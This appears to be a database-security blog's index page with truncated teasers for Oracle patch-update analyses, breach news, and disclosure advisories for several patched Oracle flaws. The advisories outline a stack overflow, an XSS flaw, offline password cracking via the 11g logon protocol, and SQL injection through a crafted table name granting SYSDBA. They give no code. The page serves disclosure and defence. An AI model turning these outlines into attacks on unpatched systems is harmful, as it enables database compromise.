The TeamSHATTER blog is now part of Spiderlabs – Anterior
The TeamSHATTER blog is now part of Spiderlabs – Anterior
Posted 3 years ago

Many of you are probably already aware of the acquisition of Application Security, Inc. by Trustwave. As part of the acquisition, we are pleased to announce that TeamSHATTER is combining…

TeamSHATTER’s Analysis of the October 2013 Oracle CPU
TeamSHATTER’s Analysis of the October 2013 Oracle CPU
Posted 4 years ago

It’s the second Tuesday in October, so it is Oracle Critical Patch Update (CPU) time. The October 2013 CPU contains 127 fixes across Oracle’s Database, Fusion Middleware, Enterprise Manager, E-Business…

TeamSHATTER’s Analysis of the July 2013 Oracle CPU
TeamSHATTER’s Analysis of the July 2013 Oracle CPU
Posted 4 years ago

It is Oracle Critical Patch Update (CPU) time, so lace up your patching gloves. The July 2013 CPU contains 89 fixes across Oracle’s Database, Fusion Middleware, Hyperion, Enterprise Manager, E-Business…

PreviousNext
RSS

Advisory: Oracle Database GeoRaster API overflowTeam Shatter Exclusive

Risk Level: High Affected versions: Oracle Database 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, 11.2.0.3 Remote exploitable: Yes Credits: This vulnerability was discovered and researched by Martin Rakhmanov of Application Security Inc. Details: GeoRaster is a feature of Oracle Spatial that lets you store, index, query, analyze, and deliver GeoRaster data. One of the GeoRaster APIs is prone to stack-based overflow. *Download AppDetectivePRO Now for a FREE Database Security Assessment* Impact: An attacker that can connect to database with spatial support can…

Click for complete article >>

Oracle Database 11g stealth password cracking vulnerability in logon protocol (CVE-2012-3137)Team Shatter Exclusive

The vulnerability I will describe in this blog post has some aspects that make it especially noteworthy, which are derived from the fact that the issue lies in a critical portion of the authentication protocol. The vulnerability can be exploited in a stealth way, going undetectable because all the attacker needs is information that the Server sends freely as part of a normal authentication process. In addition, the vulnerability is so intimately part of the authentication protocol that it couldn’t…

Click for complete article >>

Advisory: Oracle Enterprise Manager XSS in XDBResource cancelURL parameterTeam Shatter Exclusive

Risk Level: High Affected versions: Oracle Enterprise Manager Database Control 10.2.0.3, 10.2.0.4; 10.2.0.5, 11.1.0.7, 11.2.0.2, 11.2.0.3 Remotely exploitable: Yes Credits: This vulnerability was discovered and researched by Qinglin Jiang of Application Security Inc. Details: Oracle Enterprise Manager Database Control XML Database Resources page is vulnerable to a Cross-Site scripting vulnerability. An attacker may inject malicious code into the web application and trick a legitimate user to execute it by various methods. The malicious code generally appears in the form of…

Click for complete article >>

Advisory: Oracle11g Stealth Password Cracking VulnerabilityTeam Shatter Exclusive

Risk Level: High Affected versions: Oracle Database Server version 11gR1, 11gR2 Remote exploitable: Yes (No authentication to Database Server is needed) Credits: This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security Inc. Details: There is a flaw in the way that Authentication Session Keys are generated and protected by Oracle Database Server during the authentication process.  It is possible to use this flaw to perform unlimited password guesses (cracking) of any user password in a similar…

Click for complete article >>

Advisory: SQL Injection in Oracle Alter FBA TableTeam Shatter Exclusive

Risk Level: High Affected versions: Oracle Database Enterprise Edition 11.1, 11.2 Remote exploitable: Yes Credits: This vulnerability was discovered and researched by Martin Rakhmanov of Application Security Inc. Details: Renaming a table having flashback archive, using specially crafted table name triggers internal SQL injection. This allows users to execute code with elevated privileges. Impact: An attacker having control over a flashback-enabled table can get SYSDBA privileges. Vendor Status: Vendor was contacted and a patch was released. Workaround: Do not grant…

Click for complete article >>

Tips To Granting Database Access Control Permissions

Posted February 13, 2013 by in Database Security with 0 comments
lock

Database permissions can cause headaches for even the most sophisticated security organizations. Indeed, many of the most persistent problems with malicious or risky database access start before the database server software is even up and running. Why are database access controls so maddeningly complex? In a word, flexibility — the very flexibility that enables organizations to create multiple and interlocking roles can also create a knot of confusion and vulnerability. Click for complete article >>

Click for complete article >>

Database Insecurity And The Trends Of 2013Team Shatter Exclusive

What is in store for us in 2013? What new threats should organizations be aware of? Are you next to be hacked? Let’s first take a quick look back at the events of 2012. In the past twelve months, the good news is that the hacktivists went away (mostly). However, we saw an increase of 45% over 2011 in the number of breaches disclosed, there were lots of new database vulnerabilities reported and patched, including one with a CVSS 10.0…

Click for complete article >>

TeamSHATTER’s Analysis Of The January 2013 Oracle CPU

Posted January 17, 2013 by in Database Security, Oracle with 0 comments

It’s Oracle Critical Patch Update (CPU) Tuesday, so lace up your patching gloves and let’s get started. The January 2013 CPU contains 86 fixes across Oracle’s Database, Access Manager/Webgate, GoldenGate Veridata, Outside In, WebLogic, Application Performance Management, Enterprise Manager, E-Business Suite, Agile PLM Framework, People Soft, JD Edwards EnterpriseOne Tools, Siebel CRM, Sun Product Suite, Virtual Box and MySQL product lines. 45 of the fixes in this CPU are for vulnerabilities that are remotely exploitable without authentication. In other words,…

Click for complete article >>

Cyber Crime Is Growing, Yet Risk Typically Not Covered By Insurance Policies

Posted January 11, 2013 by in Data Breach, Database Security with 0 comments
insurance policy

In September, the customer websites of Bank of America,  Wells Fargo, US Bank, J.P. Morgan Chase and PNC were rendered inaccessible for more than a day by the biggest cyberattack in history, now attributed to Iranian government hackers. Weeks before, online vandals breached security at LinkedIn, stealing the passwords of six million people who frequent the popular business-networking site. Whether companies are the victims of state-sponsored invasions or criminal attacks, one of the scariest threats facing businesses today is hacking—and the…

Click for complete article >>

South Carolina Agencies Still Working On Security Improvements

lock

Months after a foreign hacker broke into the South Carolina Department of Revenue’s computer system exposing millions of taxpayers’ personal records and causing the state to spend $20 million for added protection, state cabinet agencies are still working on security improvements, an examination by GreenvilleOnline.com show. Just one of South Carolina Gov. Nikki Haley’s 15 cabinet agencies questioned by the website — the Department of Probation, Pardons and Parole — responded without qualifications that it had the full basic protections…

Click for complete article >>
Powered by